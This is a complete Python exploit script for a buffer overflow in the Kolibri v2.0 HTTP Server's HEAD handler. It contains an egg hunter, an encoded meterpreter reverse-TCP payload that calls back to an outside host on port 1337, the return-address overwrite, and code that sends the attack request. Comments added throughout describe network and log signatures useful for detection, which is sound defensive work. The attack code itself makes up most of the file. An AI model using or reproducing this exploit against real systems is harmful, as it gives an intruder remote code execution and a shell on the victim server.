#!/usr/bin/python
#---------------------------------------------------------------------------------#
# Exploit: Kolibri v2.0 HTTP Server, HEAD Buffer Overflow (Egg Hunter) #
# OS: Windows XP Pro SP3 #
# Software: http://cdn01.exploit-db.com/wp-content/themes/exploit/applications/ #
# f248239d09b37400e8269cb1347c240e-BladeAPIMonitor-3.6.9.2.Setup.exe #
# #
# Author: Oraclox (Brandon Ceja) #
#---------------------------------------------------------------------------------#
import sys, os, socket
#-----------------------------------------------------------------------#
# Badchars: \x00\x0d\x0a\x3d\x20\x3f #
#-----------------------------------------------------------------------#
# Egg Hunter from Fuzzy Security #
# Size = 32-bytes | Tag = 1337 #
#-----------------------------------------------------------------------#
# Egg hunter stub: 32 bytes (8 lines x 4 bytes), attributed in the header
# above to the Fuzzy Security tutorial. Per the description further down,
# its job is to locate the "13371337" marker that stage2 places in front of
# the payload elsewhere in process memory and transfer control there; the
# 4-byte tag "1337" is the ASCII run \x31\x33\x33\x37 spread over the two
# lines marked #13 / #37 below.
# Detection note: the stub and its tag are static bytes that appear verbatim
# in the request path, so they can be matched directly in HTTP logs or IDS
# content rules without decoding anything.
egg=(
"\x66\x81\xCA\xFF"
"\x0F\x42\x52\x6A"
"\x02\x58\xCD\x2E"
"\x3C\x05\x5A\x74"
"\xEF\xB8\x31\x33" #13  tag bytes "13"
"\x33\x37\x8B\xFA" #37  tag bytes "37"
"\xAF\x75\xEA\xAF"
"\x75\xE7\xFF\xE7"
)
#-----------------------------------------------------------------------#
# Shellcode: #
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.211.131 #
# LPORT=1337 -b "\x00\x0d\x0a\x3d\x20\x3f" -f c #
#-----------------------------------------------------------------------#
# Connect using metasploit, exploit/multi/handler #
#-----------------------------------------------------------------------#
# Encoded payload blob: 368 bytes as listed (24 lines of 15 bytes plus one
# of 8). The header comment above says it was produced by msfvenom as a
# windows/meterpreter/reverse_tcp stager calling back to 192.168.211.131:1337,
# with the bad characters \x00\x0d\x0a\x3d\x20\x3f excluded. It is not placed
# in the overflowed path; stage2 sends it in the User-Agent header behind the
# "13371337" marker for the egg hunter to find.
# Defender note: the bytes are encoded and opaque here, so the callback
# host/port in the header comment are the reliable network indicator; an
# unexpected outbound TCP connection from the web server to that port is
# what a successful run would look like in egress logs.
shellcode = (
"\xda\xcb\xba\xa8\xf1\xc9\x38\xd9\x74\x24\xf4\x5f\x31\xc9\xb1"
"\x56\x83\xc7\x04\x31\x57\x14\x03\x57\xbc\x13\x3c\xc4\x54\x51"
"\xbf\x35\xa4\x36\x49\xd0\x95\x76\x2d\x90\x85\x46\x25\xf4\x29"
"\x2c\x6b\xed\xba\x40\xa4\x02\x0b\xee\x92\x2d\x8c\x43\xe6\x2c"
"\x0e\x9e\x3b\x8f\x2f\x51\x4e\xce\x68\x8c\xa3\x82\x21\xda\x16"
"\x33\x46\x96\xaa\xb8\x14\x36\xab\x5d\xec\x39\x9a\xf3\x67\x60"
"\x3c\xf5\xa4\x18\x75\xed\xa9\x25\xcf\x86\x19\xd1\xce\x4e\x50"
"\x1a\x7c\xaf\x5d\xe9\x7c\xf7\x59\x12\x0b\x01\x9a\xaf\x0c\xd6"
"\xe1\x6b\x98\xcd\x41\xff\x3a\x2a\x70\x2c\xdc\xb9\x7e\x99\xaa"
"\xe6\x62\x1c\x7e\x9d\x9e\x95\x81\x72\x17\xed\xa5\x56\x7c\xb5"
"\xc4\xcf\xd8\x18\xf8\x10\x83\xc5\x5c\x5a\x29\x11\xed\x01\x25"
"\xd6\xdc\xb9\xb5\x70\x56\xc9\x87\xdf\xcc\x45\xab\xa8\xca\x92"
"\xba\xbf\xec\x4d\x04\xaf\x12\x6e\x74\xf9\xd0\x3a\x24\x91\xf1"
"\x42\xaf\x61\xfd\x96\x45\x68\x69\xd9\x31\xbf\xea\xb1\x43\x40"
"\xe8\x78\xca\xa6\xa2\x2a\x9c\x76\x03\x9b\x5c\x27\xeb\xf1\x53"
"\x18\x0b\xfa\xbe\x31\xa6\x15\x16\x69\x5f\x8f\x33\xe1\xfe\x50"
"\xee\x8f\xc1\xdb\x1a\x6f\x8f\x2b\x6f\x63\xf8\x4b\x8f\x7b\xf9"
"\xf9\x8f\x11\xfd\xab\xd8\x8d\xff\x8a\x2e\x12\xff\xf8\x2d\x55"
"\xff\x7c\x07\x2d\x36\xeb\x27\x59\x37\xfb\xa7\x99\x61\x91\xa7"
"\xf1\xd5\xc1\xf4\xe4\x19\xdc\x69\xb5\x8f\xdf\xdb\x69\x07\x88"
"\xe1\x54\x6f\x17\x1a\xb3\xf3\x50\xe4\x41\xdc\xf8\x8c\xb9\x5c"
"\xf9\x4c\xd0\x5c\xa9\x24\x2f\x72\x46\x84\xd0\x59\x0f\x8c\x5b"
"\x0c\xfd\x2d\x5b\x05\xa3\xf3\x5c\xaa\x78\x04\x26\xc3\x7f\xe5"
"\xd7\xcd\x1b\xe6\xd7\xf1\x1d\xdb\x01\xc8\x6b\x1a\x92\x6f\x63"
"\x29\xb7\xc6\xee\x51\xeb\x19\x3b"
)
#-------------------------------------------------------#
# Description stage1 : #
# (1) Overwrite EIP with the address of a jmp esp #
# (2) At ESP, jump backwards 80 bytes #
# (3) The Egg Hunter is waiting 80 bytes back #
#-------------------------------------------------------#
# EIP: 0x77fab227 = jmp esp | SHLWAPI.dll #
# ESP: \xEB\xB0 = jmp short -80 bytes #
#-------------------------------------------------------#
# Description stage2 : #
# (4) Send the shellcode in the User-Agent, which #
# is stored somewhere in memory, waiting #
# for the Egg Hunter to find it. #
#-------------------------------------------------------#
# Structure: AAAA + egg + BBBBBB + EIP + ESP + CCCCCCC #
# stage1 -- the request path that overflows the HEAD handler, 600 bytes in
# total: 450 x "A" filler + the 32-byte egg hunter + 33 x "B" + the 4-byte
# return-address overwrite (0x77fab227 written little-endian as
# \x27\xb2\xfa\x77, described above as jmp esp in SHLWAPI.dll) + 10 x NOP
# (\x90) + \xEB\xB0 (jmp short -80, intended per the comments above to land
# back on the egg hunter) + 69 x "C" tail padding.
stage1 = "A" * 450 + egg + "B" * 33 + "\x27\xb2\xfa\x77" + "\x90" * 10 + "\xEB\xB0" + "C" * 69
# stage2 -- the 8-byte marker "13371337" (the tag doubled, which is what the
# hunter searches for) immediately followed by the encoded payload. It is
# carried in the User-Agent header, not in the path.
stage2 = "13371337" + shellcode
# request -- one HEAD request carrying both stages. Adjacent string literals
# inside the parentheses are joined at compile time, so the result is a
# single str. Written for Python 2: these are text str literals that are
# handed straight to socket.send() below.
# Detection note: the request line reads "HTTP 1.1" (no slash), the
# "Keep Alive" header name is not the standard Keep-Alive, the path is
# ~600 bytes of mostly repeated A/B/C characters, and the User-Agent begins
# with "13371337". Any one of these stands out in web-server or proxy logs;
# together they are a precise signature for this traffic.
request = (
"HEAD /"+ stage1 + " HTTP 1.1\r\n"
"Host: 192.168.211.128:8080\r\n"
"User-Agent:" + stage2 + "\r\n"
"Keep Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n"
)
# Delivery: a single TCP connection to the hard-coded target (the same
# host:port as the Host header), one send() of the whole request, then
# close. Nothing is read back, so the script itself gives no indication of
# whether the request was delivered or what the server did with it.
# From the server side the only observables are the one short-lived
# connection and the malformed HEAD request described above; a successful
# run would additionally show the server process opening the outbound
# connection named in the shellcode header comment.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.211.128", 8080))
s.send(request)
s.close()